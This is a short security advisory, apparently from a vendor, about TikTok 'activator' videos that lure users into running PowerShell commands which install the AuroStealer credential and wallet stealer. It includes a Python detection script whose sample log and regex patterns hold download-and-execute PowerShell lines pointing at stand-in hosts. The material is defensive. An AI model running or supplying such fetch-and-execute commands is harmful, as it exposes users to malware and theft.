Cyber threat infographic: TikTok video icon with PowerShell command arrows leading to malware icons (AuroStealer, crypto theft); protective shields for antivirus and MFA, with "Don't Run Unknown Commands" warning banner over a social media feed.

Attackers exploit TikTok's popularity with videos posing as free Photoshop activators, tricking users into running PowerShell commands that fetch AuroStealer malware for credential theft and crypto wallet draining. The commands use Invoke-Expression to execute scripts from malicious hosts, blending with ClickFix tactics for social engineering.


The malware persists via scheduled tasks that mimic legitimate updates, then compiles its own code in memory using the .NET compiler, avoiding disk writes and detection. Similar videos use "Activate Office" or "Unlock Windows" themes, expanding the campaign's reach.


Defend against this:

Avoid running commands from unverified sources, use antivirus with behavioral analysis, and enable MFA. TikTok and other platforms should alert users to dangerous instructions to prevent these evolving threats.
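
For defenders who collect PowerShell command or script block logs, the sketch below flags the behaviours described above: Invoke-Expression combined with a remote fetch, scheduled-task creation, and in-memory .NET compilation. It is an added example, not code from this article or from NPAV; the indicator patterns, the function names `triage` and `scan`, and the sample log lines are assumptions constructed for illustration, not indicators taken from the campaign.

```python
import re
from urllib.parse import urlsplit

# Indicator patterns are assumptions chosen for this example, not campaign IoCs.
EXEC = re.compile(r"(?<![\w-])(invoke-expression|iex)(?![\w-])", re.I)
FETCH = re.compile(
    r"(?<![\w-])(invoke-restmethod|irm|invoke-webrequest|iwr|downloadstring)(?![\w-])",
    re.I,
)
URL = re.compile(r"https?://[^\s'\"|)]+", re.I)
# Follow-on behaviour the article describes. Both also occur in legitimate
# administration, so treat them as context for an analyst, not as verdicts.
FOLLOW_ON = {
    "scheduled_task": re.compile(r"register-scheduledtask|schtasks(\.exe)?\s+/create", re.I),
    "dotnet_compile": re.compile(r"(?<![\w-])add-type(?![\w-])", re.I),
}

def triage(command: str) -> dict:
    """Classify one logged PowerShell command or script block."""
    findings = []
    # Fetching alone is routine; fetching combined with Invoke-Expression
    # means remote text is being executed as code.
    if EXEC.search(command) and FETCH.search(command):
        findings.append("download_and_execute")
    for name, pattern in FOLLOW_ON.items():
        if pattern.search(command):
            findings.append(name)
    hosts = sorted({h for u in URL.findall(command) if (h := urlsplit(u).hostname)})
    return {"findings": findings, "hosts": hosts}

# Constructed sample log entries; hosts use the reserved .invalid TLD.
SAMPLE_LOG = [
    "iex (irm https://activator.example.invalid/ps)",
    "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://cdn.example.invalid/a.ps1')",
    "Register-ScheduledTask -TaskName 'UpdaterTask' -Action $action -Trigger $trigger",
    "Add-Type -TypeDefinition $source -Language CSharp",
    "Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv",
    "Get-ChildItem C:\\Users -Recurse | Measure-Object",
]

def scan(lines):
    """Return (line, result) pairs for entries with at least one finding."""
    return [(line, r) for line in lines if (r := triage(line))["findings"]]

if __name__ == "__main__":
    for line, result in scan(SAMPLE_LOG):
        print(result["findings"], result["hosts"], "<-", line)
```

The plain download to a file and the directory listing are deliberately left unflagged, which shows why the rule keys on the fetch-plus-execute combination rather than on either cmdlet alone.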


NPAV offers a robust solution to combat cyber fraud. Protect yourself with our top-tier security product, FraudProtector.net